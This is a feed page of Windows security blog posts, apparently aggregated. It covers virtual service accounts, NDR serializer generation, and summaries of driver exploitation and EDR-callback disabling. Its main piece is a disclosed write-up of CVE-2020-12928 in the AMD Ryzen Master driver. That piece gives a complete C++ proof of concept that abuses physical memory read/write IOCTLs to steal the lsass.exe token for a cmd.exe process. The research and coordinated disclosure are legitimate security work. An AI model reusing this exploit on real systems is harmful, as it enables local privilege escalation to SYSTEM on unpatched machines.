Normal view

There are new articles available, click to refresh the page.
Before yesterdayWindows Exploitation

Creating your own Virtual Service Accounts

By: tiraniddo
26 October 2020 at 23:54

Following on from the previous blog post, if you can't map arbitrary SIDs to names to make displaying capabilities nicer what is the purpose of LsaManageSidNameMapping? The primary purpose is to facilitate the creation of Virtual Service Accounts

A virtual service account allows you to create an access token where the user SID is a service SID, for example, NT SERVICE\TrustedInstaller. A virtual service account doesn't need to have a password configured which makes them ideal for restricting services rather than having to deal with the default service accounts and using WSH to lock them down or specifying a domain user with password.

To create an access token for a virtual service account you can use LogonUserExEx and specify the undocumented (AFAIK) LOGON32_PROVIDER_VIRTUAL logon provider. You must have SeTcbPrivilege to create the token, and the SID of the account must have its first RID in the range 80 to 111 inclusive. Recall from the previous blog post this is exactly the same range that is covered by LsaManageSidNameMapping.

The LogonUserExEx API only takes strings for the domain and username, you can't specify a SID. Using the LsaManageSidNameMapping function allows you to map a username and domain to a virtual service account SID. LSASS prevents you from using RID 80 (NT SERVICE) and 87 (NT TASK) outside of the SCM or the task scheduler service (see this snippet of reversed LSASS code for how it checks). However everything else in the RID range is fair game.

So let's create out own virtual service account. First you need to add your domain and username using the tool from the previous blog post. All these commands need to be run as a user with SeTcbPrivilege.

SetSidMapping.exe S-1-5-100="AWESOME DOMAIN" 
SetSidMapping.exe S-1-5-100-1="AWESOME DOMAIN\USER"

So we now have the AWESOME DOMAIN\USER account with the SID S-1-5-100-1. Now before we can login the account you need to grant it a logon right. This is normally SeServiceLogonRight if you wanted a service account, but you can specify any logon right you like, even SeInteractiveLogonRight (sadly I don't believe you can actually login with your virtual account, at least easily).

If you get the latest version of NtObjectManager (from github at the time of writing) you can use the Add-NtAccountRight command to add the logon type.

PS> Add-NtAccountRight -Sid 'S-1-5-100-1' -LogonType SeInteractiveLogonRight

Once granted a logon right you can use the Get-NtToken command to logon the account and return a token.

PS> $token = Get-NtToken -Logon -LogonType Interactive -User USER -Domain 'AWESOME DOMAIN' -LogonProvider Virtual
PS> Format-NtToken $token
AWESOME DOMAIN\USER

As you can see we've authenticated the virtual account and got back a token. As we chose to logon as an interactive type the token will also have the INTERACTIVE group assigned. Anyway that's all for now. I guess as there's only a limited number of RIDs available (which is an artificial restriction) MS don't want document these features even though it could be a useful thing for normal developers.



Using LsaManageSidNameMapping to add a name to a SID.

By: tiraniddo
24 October 2020 at 23:23

I was digging into exactly how service SIDs are mapped back to a name when I came across the API LsaLookupManageSidNameMapping. Unsurprisingly this API is not officially documented either on MSDN or in the Windows SDK. However, LsaManageSidNameMapping is documented (mostly). Turns out that after a little digging they lead to the same RPC function in LSASS, just through different names:

LsaLookupManageSidNameMapping -> lsass!LsaLookuprManageCache

and

LsaManageSidNameMapping -> lsasrv!LsarManageSidNameMapping

They ultimately both end up in lsasrv!LsarManageSidNameMapping. I've no idea why there's two of them and why one is documented but the other not. *shrug*. Of course even though there's an MSDN entry for the function it doesn't seem to actually be documented in the Ntsecapi.h include file *double shrug*. Best documentation I found was this header file.

This got me wondering if I could map all the AppContainer named capabilities via LSASS so that normal applications would resolve them rather than having to do it myself. This would be easier than modifying the SAM or similar tricks. Sadly while you can add some SID to name mappings this API won't let you do that for capability SIDs as there are the following calling restrictions:

  1. The caller needs SeTcbPrivilege (this is a given with an LSA API).
  2. The SID to map must be in the NT security authority (5) and the domain's first RID must be between 80 and 111 inclusive.
  3. You must register a domain SID's name first to use the SID which includes it.
Basically 2 stops us adding a sub-domain SID for a capability as they use the package security authority (15) and we can't just go straight to added the SID to name as we need to have registered the domain with the API, it's not enough that the domain exists. Maybe there's some other easy way to do it, but this isn't it.

Instead I've just put together a .NET tool to add or remove your own SID to name mappings. It's up on github. The mappings are ephemeral so if you break something rebooting should fix it :-)


CVE-2020-12928 Exploit Proof-of-Concept, Privilege Escalation in AMD Ryzen Master AMDRyzenMasterDriver.sys

By: h0mbre
13 October 2020 at 04:00

Background

Earlier this year I was really focused on Windows exploit development and was working through the FuzzySecurity exploit development tutorials on the HackSysExtremeVulnerableDriver to try and learn and eventually went bug hunting on my own.

I ended up discovering what could be described as a logic bug in the ATI Technologies Inc. driver ‘atillk64.sys’. Being new to the Windows driver bug hunting space, I didn’t realize that this driver had already been analyzed and classified as vulnerable by Jesse Michael and his colleague Mickey in their ‘Screwed Drivers’github repo. It had also been mentioned in several other places that have been pointed out to me since.

So I didn’t really feel like I had discovered my first real bug and decided to hunt similar bugs on Windows 3rd party drivers until I found my own in the AMD Ryzen Master AMDRyzenMasterDriver.sys version 15.

I have since stopped looking for these types of bugs as I believe they wouldn’t really help me progress skills wise and my goals have changed since.

Thanks

Huge thanks to the following people for being so charitable, publishing things, messaging me back, encouraging me, and helping me along the way:

AMD Ryzen Master

The AMD Ryzen Master Utility is a tool for CPU overclocking. The software purportedly supports a growing list of processors and allows users fine-grained control over the performance settings of their CPU. You can read about it here

AMD has published an advisory on their Product Security page for this vulnerability.

Vulnerability Analysis Overview

This vulnerability is extremely similar to my last Windows driver post, so please give that a once-over if this one lacks any depth and leaves you curious. I will try my best to limit the redudancy with the previous post.

All of my analysis was performed on Windows 10 Build 18362.19h1_release.190318-1202.

I picked this driver as a target because it is common of 3rd-party Windows drivers responsible for hardware configurations or diagnostics to make available to low-privileged users powerful routines that directly read from or write to physical memory.

Checking Permissions

The first thing I did after installing AMD Ryzen Master using the default installer was to locate the driver in OSR’s Device Tree utility and check its permissions. This is the first thing I was checking during this period because I had read that Microsoft did not consider a violation of the security boundary between Administrator and SYSTEM to be a serious violation. I wanted to ensure that my targets were all accessible from lower privileged users and groups.

Luckily for me, Device Tree indicated that the driver allowed all Authenticated Users to read and modify the driver.

Finding Interesting IOCTL Routines

Write What Where Routine

Next, I started looking at the driver in in a free version of IDA. A search for MmMapIoSpace returned quite a few places in which the api was cross referenced. I just began going down the list to see what code paths could reach these calls.

The first result, sub_140007278, looked very interesting to me.

We don’t know at this point if we control the API parameters in this routine but looking at the routine statically you can see that we make our call to MmMapIoSpace, it stores the returned pointer value in [rsp+48h+BaseAddress] and does a check to make sure the return value was not NULL. If we have a valid pointer, we then progress into this loop routine on the bottom left.

At the start of the looping routine, we can see that eax gets the value of dword ptr [rsp+48h+NumberOfBytes] and then we compare eax to [rsp+48h+var_24]. This makes some sense because we already know from looking at the API call that [rsp+48h+NumberOfBytes] held the NumberOfBytes parameter for MmMapIoSpace. So essentially what this is looking like is, a check to see if a counter variable has reached our NumberOfBytes value. A quick highlight of eax shows that later it takes on the value of [rsp+48h+var_24], is incremented, and then eax is put back into [rsp+48h+var_24]. Then we’re back at the top of our loop where eax is set equal to NumberOfBytes before every check.

So this to me looked interesting, we can see that we’re doing something in a loop, byte by byte, until our NumberOfBytes value is reached. Once that value is reached, we see the other branch in our loop when our NumberOfBytes value is reached is a call to MmUnmapIoSpace.

Looking a bit closer at the loop, we can see a few interesting things. ecx is essentially a counter here as its set equal to our already mentioned counters eax and [rsp+48h+var_24]. We also see there is a mov to [rdx+rcx] from al. A single byte is written to the location of rdx + rcx. So we can make a guess that rdx is a base address and rcx is an offset. This is what a traditional for loop would seem to look like disassembled. al is taken from another similar construction in [r8+rax] where rax is now acting as the offset and r8 is a different base address.

So all in all, I decided this looks like a routine that is either doing a byte by byte read or a byte by byte write to kernel memory most likely. But if you look closely, you can see that the pointer returned from MmMapIoSpace is the one that al is written to (while tracking an offset) because it is eventually moved into rdx for the mov [rdx+rcx], al operation. This was exciting for me because if we can control the parameters of MmMapIoSpace, we will possibly be able to specify a physical memory address and offset and copy a user controlled buffer into that space once it is mapped into our process space. This is essentially a write what where primitive!

Looking at the first cross-reference to this routine, I started working my way back up the call graph until I was able to locate a probable IOCTL code.

After banging my head against my desk for hours trying to pass all of the checks to reach our glorious write what where routine, I was finally able to reach it and get a reliable BSOD. The checks were looking at the sizes of my input and output buffers supplied to my DeviceIoControl call. I was able to solve this by simply stringing together random length buffers of something like AAAAAAAABBBBBBBBCCCCCCCC etc, and seeing how the program would parse my input. Eventually I was able to figure out that the input buffer was structured as follows:

  • first 8 bytes of my input buffer would be the desired physical address you want mapped,
  • the next 4 bytes would represent the NumberOfBytes parameter,
  • and finally, and this is what took me the longest, the next 8 bytes were to be a pointer to the buffer you wanted to overwrite the mapped kernel memory with.

Very cool! We have control over all the MmMapIoSpace params except CacheType and we can specify what buffer to copy over!

This is progress, I was fairly certain at this point I had a write primitive; however, I wasn’t exactly sure what to do with it. At this point, I reasoned that if a routine existed to do a byte by byte write to a kernel buffer somewhere, I probably also had the ability to do a byte by byte read of a kernel buffer. So I set out to find my routine’s sibling, the read what where routine (if she existed).

Read What Where

Now I went back to the other cross references of MmMapIoSpace calls and eventually came upon this routine, sub_1400063D0.

You’d be forgiven if you think it looks just like the last routine we analyzed, I know I did and missed it initially; however, this routine differs in one major way. Instead of copying byte by byte out of our process space buffer and into a kernel buffer, we are copying byte by byte out of a kernel buffer and into our process space buffer. I will spare you the technical analysis here but it is essentially our other routine except only the source and destinations are reversed! This is our read what where primitive and I was able to back track a cross reference in IDA to this IOCTL.

There were a lot of rabbit holes here to go down but eventually this one ended up being straightforward once I found a clear cut code path to the routine from the IOCTL call graph.

Once again, we control the important MmMapIoSpace parameters and, this is a difference from the other IOCTL, the byte by byte transfer occurs in our DeviceIoControl output buffer argument at an offset of 0xC bytes. So we can tell the driver to read physical memory from an arbitrary address, for an arbitrary length, and send us the results!

With these two powerful primitives, I tried to recreate my previous exploitation strategy employed in my last post.

Exploitation

Here I will try to walk through some code snippets and explain my thinking. Apologies for any programming mistakes in this PoC code; however, it works reliably on all the testing I performed (and it worked well enough for AMD to patch the driver.)

First, we’ll need to understand what I’m fishing for here. As I explained in my previous post, I tried to employ the same strategy that @b33f did with his driver exploit and fish for "Proc" tags in the kernel pool memory. Please refer to that post for any questions here. The TL;DR here is that information about processes are stored in the EPROCESS structure in the kernel and some of the important members for our purposes are:

  • ImageFileName (this is the name of the process)
  • UniqueProcessId (the PID)
  • Token (this is a security token value)

The offsets from the beginning of the structure to these members was as follows on my build:

  • 0x2e8 to the UniqueProcessId
  • 0x360 to the Token
  • 0x450 to the ImageFileName

You can see the offsets in WinDBG:

kd> !process 0 0 lsass.exe
PROCESS ffffd48ca64e7180
    SessionId: 0  Cid: 0260    Peb: 63d241d000  ParentCid: 01f0
    DirBase: 1c299b002  ObjectTable: ffffe60f220f2580  HandleCount: 1155.
    Image: lsass.exe

kd> dt nt!_EPROCESS ffffd48ca64e7180 UniqueProcessId Token ImageFilename
   +0x2e8 UniqueProcessId : 0x00000000`00000260 Void
   +0x360 Token           : _EX_FAST_REF
   +0x450 ImageFileName   : [15]  "lsass.exe"

Each data structure in the kernel pool has various headers, (thanks to ReWolf for breaking this down so well):

  • POOL_HEADER structure (this is where our "Proc" tag will reside),
  • OBJECT_HEADER_xxx_INFO structures,
  • OBJECT_HEADER which, contains a Body where the EPROCESS structure lives.

As b33f explains, in his write-up, all of the addresses where one begins looking for a "Proc" tag are 0x10 aligned, so every address here ends in a 0. We know that at some arbitrary address ending in 0, if we look at <address> + 0x4 that is where a "Proc" tag might be.

Leveraging Read What Where

The difficulty on my Windows build was that the length from my "Proc" tag once found, to the beginning of the EPROCESS structure where I know the offsets to the members I want varied wildly. So much so that in order to get the exploit working reliably, I just simply had to create my own data structure and store instances of them in a vector. The data structure was as follows:

struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;
};

So as I’m using our Read What Where primitive to blow through all the RAM hunting for "Proc", if I find an instance of "Proc" I’ll iterate 0x10 bytes at a time until I find a marker signifying the end of our pool headers and the beginning of EPROCESS. This marker was 0x00B80003. So now, I’ll have the proc_address the literal place where "Proc" was and store that in PROC_DATA.proc_address, I’ll also annotate how far that address was from the nearest page-aligned memory address (a multiple of 0x1000) in PROC_DATA.proc_address and also annotate how far from "Proc" it was until we reached our marker or the beginning of EPROCESS in PROC.header_size. These will all be stored in a vector.

You can see this routine here:

INT64 results_begin = ((INT64)output_buff + 0xc);
        for (INT64 i = 0; i < 0xF60; i = i + 0x10) {

            PINT64 proc_ptr = (PINT64)(results_begin + 0x4 + i);
            INT32 proc_val = *(PINT32)proc_ptr;

            if (proc_val == 0x636f7250) {

                for (INT64 x = 0; x < 0xA0; x = x + 0x10) {

                    PINT64 header_ptr = PINT64(results_begin + i + x);
                    INT32 header_val = *(PINT32)header_ptr;

                    if (header_val == 0x00B80003) {

                        proc_count++;
                        cout << "\r[>] Proc chunks found: " << dec <<
                            proc_count << flush;

                        INT64 temp_addr = input_buff.start_address + i;

                        // This address might not be page-aligned to 0x1000
                        // so find out how far off from a multiple of 
                        // 0x1000 we are. This value is stored in our 
                        // PROC_DATA struct in the page_entry_offset
                        // member.
                        INT64 modulus = temp_addr % 0x1000;
                        proc_data.page_entry_offset.push_back(modulus);

                        // This is the page-aligned address where, either
                        // small or large paged memory will hold our "Proc"
                        // chunk. We store this as our proc_address member
                        // in PROC_DATA.
                        INT64 page_address = temp_addr - modulus;
                        proc_data.proc_address.push_back(
                            page_address);
                        proc_data.header_size.push_back(x);
                    }
                }
            }
        }

It will be more obvious with the entire exploit code, but what I’m doing here is basically starting from a physical address, and calling our read what where with a read size of 0x100c (0x1000 + 0xc as required so we can capture a whole page of memory and still keep our returned metadata information that starts at offset 0xc in our output buffer) in a loop all the while adding these discovered PROC_DATA structures to a vector. Once we hit our max address or max iterations, we’ll send this vector over to a second routine that parses out all the data we care about like the EPROCESS members we care about.

It is important to note that I took great care to make sure that all calls to MmMapIoSpace used page-aligned physical addresses as this is the most stable way to call the API

Now that I knew exactly how many "Proc" chunks I had found and stored all their relevant metadata in a vector, I could start a second routine that would use that metadata to check for their EPROCESS member values to see if they were processes I cared about.

My strategy here was to find the EPROCESS members for a privileged process such as lsass.exe and swap its security token with the security token of a cmd.exe process that I owned. You can see a portion of that code here:

INT64 results_begin = ((INT64)output_buff + 0xc);

        INT64 imagename_address = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x450; //ImageFileName
        INT64 imagename_value = *(PINT64)imagename_address;

        INT64 proc_token_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x360; //Token
        INT64 proc_token = *(PINT64)proc_token_addr;

        INT64 pid_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x2e8; //UniqueProcessId
        INT64 pid_value = *(PINT64)pid_addr;

        int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
            imagename_value);

        if (sys_result != 0) {

            system_token_count++;
            system_tokens.token_name.push_back(imagename_value);
            system_tokens.token_value.push_back(proc_token);
        }

        if (imagename_value == 0x6578652e646d63) {
            //cout << "[>] cmd.exe found!\n";
            cmd_token_address = (start_address + proc_data.header_size[i] +
                proc_data.page_entry_offset[i] + 0x360);
        }
    }

    if (system_tokens.token_name.size() != 0 and cmd_token_address != 0) {
        cout << "\n[>] cmd.exe and SYSTEM token information found!\n";
        cout << "[>] Let's swap tokens!\n";
    }
    else if (cmd_token_address == 0) {
        cout << "[!] No cmd.exe token address found, exiting...\n";
        exit(1);
    }

So now at this point I had the location and values of every thing I cared about and it was time to leverage the Write What Where routine we had found.

Leveraging Write What Where

The problem I was facing was that I need my calls to MmMapIoSpace to be page-aligned so that the calls remain stable and we don’t get any unnecessary BSODs.

So let’s picture a page of memory as a line.

<—————–MEMORY PAGE—————–>

We can only write in page-size chunks; however, the value we want to overwrite, the value of the cmd.exe process’s Token, is most-likely not page-aligned. So now we have this:

<———TOKEN——————————->

I could do a direct write at the exact address of this Token value, but my call to MmMapIoSpace would not be page-aligned.

So what I did was one more Read What Where call to store everything on that page of memory in a buffer and then overwrite the cmd.exe Token with the lsass.exe Token and then use that buffer in my call to the Write What Where routine.

So instead of an 8 byte write to simply overwrite the value, I’d be opting to completely overwrite that entire page of memory but only changing 8 bytes, that way the calls to MmMapIoSpace stay clean.

You can see some of that math in the code snippet below with references to modulus. Remember that the Write What Where utilized the input buffer of DeviceIoControl as the buffer it would copy over into the kernel memory:

if (!DeviceIoControl(
        hFile,
        READ_IOCTL,
        &input_buff,
        0x40,
        output_buff,
        modulus + 0xc,
        &bytes_ret,
        NULL))
    {
        cout << "[!] Failed the read operation to copy the cmd.exe page...\n";
        cout << "[!] Last error: " << hex << GetLastError() << "\n";
        exit(1);
    }

    PBYTE results = (PBYTE)((INT64)output_buff + 0xc);

    PBYTE cmd_page_buff = (PBYTE)VirtualAlloc(
        NULL,
        modulus + 0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
   

    DWORD num_of_bytes = modulus + 0x8;

    INT64 start_address = cmd_token_address;
    cout << "[>] cmd.exe token located at: " << hex << start_address << "\n";
    INT64 new_token_val = system_tokens.token_value[0];
    cout << "[>] Overwriting token with value: " << hex << new_token_val << "\n";

    memcpy(cmd_page_buff, results, modulus);
    memcpy(cmd_page_buff + modulus, (void*)&new_token_val, 0x8);

    // PhysicalAddress
    // NumberOfBytes
    // Buffer to be copied into system space
    BYTE input[0x1000] = { 0 };
    memcpy(input, (void*)&cmd_page, 0x8);
    memcpy(input + 0x8, (void*)&num_of_bytes, 0x4);
    memcpy(input + 0xc, cmd_page_buff, modulus + 0x8);

    if (DeviceIoControl(
        hFile,
        WRITE_IOCTL,
        input,
        modulus + 0x8 + 0xc,
        NULL,
        0,
        &bytes_ret,
        NULL))
    {
        cout << "[>] Write operation succeeded, you should be nt authority/system\n";
    }
    else {
        cout << "[!] Write operation failed, exiting...\n";
        exit(1);
    }

Final Results

You can see the mandatory full exploit screenshot below:

Disclosure Timeline

Big thanks to Tod Beardsley at Rapid7 for his help with the disclosure process!

  • 1 May 2020: Vendor notified of vulnerability
  • 1 May 2020: Vendor acknowledges vulnerability
  • 18 May 2020: Vendor supplies patch, restricting driver access to Administrator group
  • 18 May 2020 - 11 July 2020: Back and forth about CVE assignment
  • 23 Aug 2020 - CVE-2020-12927 assigned
  • 13 Oct 2020 - Joint Disclosure

Exploit Proof of Concept

#include <iostream>
#include <vector>
#include <chrono>
#include <iomanip>
#include <Windows.h>
using namespace std;

#define DEVICE_NAME         "\\\\.\\AMDRyzenMasterDriverV15"
#define WRITE_IOCTL         (DWORD)0x81112F0C
#define READ_IOCTL          (DWORD)0x81112F08
#define START_ADDRESS       (INT64)0x100000000
#define STOP_ADDRESS        (INT64)0x240000000

// Creating vector of hex representation of ImageFileNames of common 
// SYSTEM processes, eg. 'wmlms.exe' = hex('exe.smlw')
vector<INT64> SYSTEM_procs = {
    //0x78652e7373727363,         // csrss.exe
    0x78652e737361736c,         // lsass.exe
    //0x6578652e73736d73,         // smss.exe
    //0x7365636976726573,         // services.exe
    //0x6b6f72426d726753,         // SgrmBroker.exe
    //0x2e76736c6f6f7073,         // spoolsv.exe
    //0x6e6f676f6c6e6977,         // winlogon.exe
    //0x2e74696e696e6977,         // wininit.exe
    //0x6578652e736d6c77,         // wlms.exe
};

typedef struct {
    INT64 start_address;
    DWORD num_of_bytes;
    PBYTE write_buff;
} WRITE_INPUT_BUFFER;

typedef struct {
    INT64 start_address;
    DWORD num_of_bytes;
    char receiving_buff[0x1000];
} READ_INPUT_BUFFER;

// This struct will hold the address of a "Proc" tag's page entry, 
// that Proc chunk's header size, and how far into the page the "Proc" tag is
struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;
};

struct SYSTEM_TOKENS {
    std::vector<INT64> token_name;
    std::vector<INT64> token_value;
} system_tokens;

INT64 cmd_token_address = 0;

HANDLE grab_handle(const char* device_name) {

    HANDLE hFile = CreateFileA(
        device_name,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        0,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE)
    {
        cout << "[!] Unable to grab handle to " << DEVICE_NAME << "\n";
        exit(1);
    }
    else
    {
        cout << "[>] Grabbed handle 0x" << hex
            << (INT64)hFile << "\n";

        return hFile;
    }
}

PROC_DATA read_mem(HANDLE hFile) {

    cout << "[>] Reading through RAM for Proc tags...\n";
    DWORD num_of_bytes = 0x1000;

    LPVOID output_buff = VirtualAlloc(NULL,
        0x100c,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    PROC_DATA proc_data;

    int proc_count = 0;
    INT64 iteration = 0;
    while (true) {

        INT64 start_address = START_ADDRESS + (0x1000 * iteration);
        if (start_address >= 0x240000000) {
            cout << "\n[>] Max address reached.\n";
            cout << "[>] Number of iterations: " << dec << iteration << "\n";
            return proc_data;
        }

        READ_INPUT_BUFFER input_buff = { start_address, num_of_bytes };

        DWORD bytes_ret = 0;

        //cout << "[>] User buffer allocated at: 0x" << hex << output_buff << "\n";
        //Sleep(500);

        if (DeviceIoControl(
            hFile,
            READ_IOCTL,
            &input_buff,
            0x40,
            output_buff,
            0x100c,
            &bytes_ret,
            NULL))
        {
            //cout << "[>] DeviceIoControl succeeded!\n";
        }

        iteration++;

        //DebugBreak();
        INT64 results_begin = ((INT64)output_buff + 0xc);
        for (INT64 i = 0; i < 0xF60; i = i + 0x10) {

            PINT64 proc_ptr = (PINT64)(results_begin + 0x4 + i);
            INT32 proc_val = *(PINT32)proc_ptr;

            if (proc_val == 0x636f7250) {

                for (INT64 x = 0; x < 0xA0; x = x + 0x10) {

                    PINT64 header_ptr = PINT64(results_begin + i + x);
                    INT32 header_val = *(PINT32)header_ptr;

                    if (header_val == 0x00B80003) {

                        proc_count++;
                        cout << "\r[>] Proc chunks found: " << dec <<
                            proc_count << flush;

                        INT64 temp_addr = input_buff.start_address + i;

                        // This address might not be page-aligned to 0x1000
                        // so find out how far off from a multiple of 
                        // 0x1000 we are. This value is stored in our 
                        // PROC_DATA struct in the page_entry_offset
                        // member.
                        INT64 modulus = temp_addr % 0x1000;
                        proc_data.page_entry_offset.push_back(modulus);

                        // This is the page-aligned address where, either
                        // small or large paged memory will hold our "Proc"
                        // chunk. We store this as our proc_address member
                        // in PROC_DATA.
                        INT64 page_address = temp_addr - modulus;
                        proc_data.proc_address.push_back(
                            page_address);
                        proc_data.header_size.push_back(x);
                    }
                }
            }
        }
    }
}

void parse_procs(PROC_DATA proc_data, HANDLE hFile) {

    int system_token_count = 0;
    DWORD bytes_ret = 0;
    DWORD num_of_bytes = 0x1000;

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x100c,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    for (int i = 0; i < proc_data.header_size.size(); i++) {

        INT64 start_address = proc_data.proc_address[i];
        READ_INPUT_BUFFER input_buff = { start_address, num_of_bytes };

        if (DeviceIoControl(
            hFile,
            READ_IOCTL,
            &input_buff,
            0x40,
            output_buff,
            0x100c,
            &bytes_ret,
            NULL))
        {
            //cout << "[>] DeviceIoControl succeeded!\n";
        }

        INT64 results_begin = ((INT64)output_buff + 0xc);

        INT64 imagename_address = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x450; //ImageFileName
        INT64 imagename_value = *(PINT64)imagename_address;

        INT64 proc_token_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x360; //Token
        INT64 proc_token = *(PINT64)proc_token_addr;

        INT64 pid_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x2e8; //UniqueProcessId
        INT64 pid_value = *(PINT64)pid_addr;

        int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
            imagename_value);

        if (sys_result != 0) {

            system_token_count++;
            system_tokens.token_name.push_back(imagename_value);
            system_tokens.token_value.push_back(proc_token);
        }

        if (imagename_value == 0x6578652e646d63) {
            //cout << "[>] cmd.exe found!\n";
            cmd_token_address = (start_address + proc_data.header_size[i] +
                proc_data.page_entry_offset[i] + 0x360);
        }
    }

    if (system_tokens.token_name.size() != 0 and cmd_token_address != 0) {
        cout << "\n[>] cmd.exe and SYSTEM token information found!\n";
        cout << "[>] Let's swap tokens!\n";
    }
    else if (cmd_token_address == 0) {
        cout << "[!] No cmd.exe token address found, exiting...\n";
        exit(1);
    }
}

void write(HANDLE hFile) {

    DWORD modulus = cmd_token_address % 0x1000;
    INT64 cmd_page = cmd_token_address - modulus;
    DWORD bytes_ret = 0x0;
    DWORD read_num_bytes = modulus;

    PBYTE output_buff = (PBYTE)VirtualAlloc(
        NULL,
        modulus + 0xc,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    READ_INPUT_BUFFER input_buff = { cmd_page, read_num_bytes };

    if (!DeviceIoControl(
        hFile,
        READ_IOCTL,
        &input_buff,
        0x40,
        output_buff,
        modulus + 0xc,
        &bytes_ret,
        NULL))
    {
        cout << "[!] Failed the read operation to copy the cmd.exe page...\n";
        cout << "[!] Last error: " << hex << GetLastError() << "\n";
        exit(1);
    }

    PBYTE results = (PBYTE)((INT64)output_buff + 0xc);

    PBYTE cmd_page_buff = (PBYTE)VirtualAlloc(
        NULL,
        modulus + 0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
   

    DWORD num_of_bytes = modulus + 0x8;

    INT64 start_address = cmd_token_address;
    cout << "[>] cmd.exe token located at: " << hex << start_address << "\n";
    INT64 new_token_val = system_tokens.token_value[0];
    cout << "[>] Overwriting token with value: " << hex << new_token_val << "\n";

    memcpy(cmd_page_buff, results, modulus);
    memcpy(cmd_page_buff + modulus, (void*)&new_token_val, 0x8);

    // PhysicalAddress
    // NumberOfBytes
    // Buffer to be copied into system space
    BYTE input[0x1000] = { 0 };
    memcpy(input, (void*)&cmd_page, 0x8);
    memcpy(input + 0x8, (void*)&num_of_bytes, 0x4);
    memcpy(input + 0xc, cmd_page_buff, modulus + 0x8);

    if (DeviceIoControl(
        hFile,
        WRITE_IOCTL,
        input,
        modulus + 0x8 + 0xc,
        NULL,
        0,
        &bytes_ret,
        NULL))
    {
        cout << "[>] Write operation succeeded, you should be nt authority/system\n";
    }
    else {
        cout << "[!] Write operation failed, exiting...\n";
        exit(1);
    }
}

int main()
{
    srand((unsigned)time(0));
    HANDLE hFile = grab_handle(DEVICE_NAME);

    PROC_DATA proc_data = read_mem(hFile);

    cout << "\n[>] Parsing procs...\n";
    parse_procs(proc_data, hFile);

    write(hFile);
}

Kernel exploitation: weaponizing CVE-2020-17382 MSI Ambient Link driver

24 September 2020 at 00:00
Preamble - Why are drivers still a valuable target? Kernels are, no euphemism intended, complex piece of software and the Windows OS is no exception. Being one of the toughest to scrutinize due to its lack of source code and undocumented APIs, it is now being more documented thanks to the immense effort from the research community. Regrettably, during recent times, it has also increased in complexity and its mitigation way improved.

Silencing the EDR. How to disable process, threads and image-loading detection callbacks.

15 July 2020 at 00:00
Backround - TL;DR This post is about resuming the very inspiring Rui’s piece on Windows Kernel’s callbacks and taking it a little further by extending new functionalities and build an all-purpose AV/EDR runtime detection bypass. Specifically, we are going to see how Kaspersky Total Security and Windows Defender are using kernel callbacks to either inhibit us from accessing LSASS loaded module or detect malicious activities. We’ll then use our evil driver to temporarily silence any registered AV’s callbacks and restore EDR original code once we are done with our task.

Generating NDR Type Serializers for C#

By: tiraniddo
1 July 2020 at 21:32
As part of updating NtApiDotNet to v1.1.28 I added support for Kerberos authentication tokens. To support this I needed to write the parsing code for Tickets. The majority of the Kerberos protocol uses ASN.1 encoding, however some Microsoft specific parts such as the Privileged Attribute Certificate (PAC) uses Network Data Representation (NDR). This is due to these parts of the protocol being derived from the older NetLogon protocol which uses MSRPC, which in turn uses NDR.

I needed to implement code to parse the NDR stream and return the structured information. As I already had a class to handle NDR I could manually write the C# parser but that'd take some time and it'd have to be carefully written to handle all use cases. It'd be much easier if I could just use my existing NDR byte code parser to extract the structure information from the KERBEROS DLL. I'd fortunately already written the feature, but it can be non-obvious how to use it. Therefore this blog post gives you an overview of how to extract NDR structure data from existing DLLs and create standalone C# type serializer.

First up, how does KERBEROS parse the NDR structure? It could have manual implementations, but it turns out that one of the lesser known features of the MSRPC runtime on Windows is its ability to generate standalone structure and procedure serializers without needing to use an RPC channel. In the documentation this is referred to as Serialization Services.

To implement a Type Serializer you need to do the following in a C/C++ project. First, add the types to serialize inside an IDL file. For example the following defines a simple type to serialize.

interface TypeEncoders
{
    typedef struct _TEST_TYPE
    {
        [unique, string] wchar_t* Name;
        DWORD Value;
    } TEST_TYPE;
}

You then need to create a separate ACF file with the same name as the IDL file (i.e. if you have TYPES.IDL create a file TYPES.ACF) and add the encode and decode attributes.

interface TypeEncoders
{
    typedef [encode, decode] TEST_TYPE;
}

Compiling the IDL file using MIDL you'll get the client source code (such as TYPES_c.c), and you should find a few functions, the most important being TEST_TYPE_Encode and TEST_TYPE_Decode which serialize (encode) and deserialize (decode) a type from a byte stream. How you use these functions is not really important. We're more interested in understanding how the NDR byte code is configured to perform the serialization so that we can parse it and generate our own serializers. 

If you look at the Decode function when compiled for a X64 target it should look like the following:

void
TEST_TYPE_Decode(
    handle_t _MidlEsHandle,
    TEST_TYPE * _pType)
{
    NdrMesTypeDecode3(
         _MidlEsHandle,
         ( PMIDL_TYPE_PICKLING_INFO  )&__MIDL_TypePicklingInfo,
         &TypeEncoders_ProxyInfo,
         TypePicklingOffsetTable,
         0,
         _pType);
}

The NdrMesTypeDecode3 is an API implemented in the RPC runtime DLL. You might be shocked to hear this, but this function and its corresponding NdrMesTypeEncode3 are not documented in MSDN. However, the SDK headers contain enough information to understand how it works.

The API takes 6 parameters:
  1. The serialization handle, used to maintain state such as the current stream position and can be used multiple times to encode or decode more that one structure in a stream.
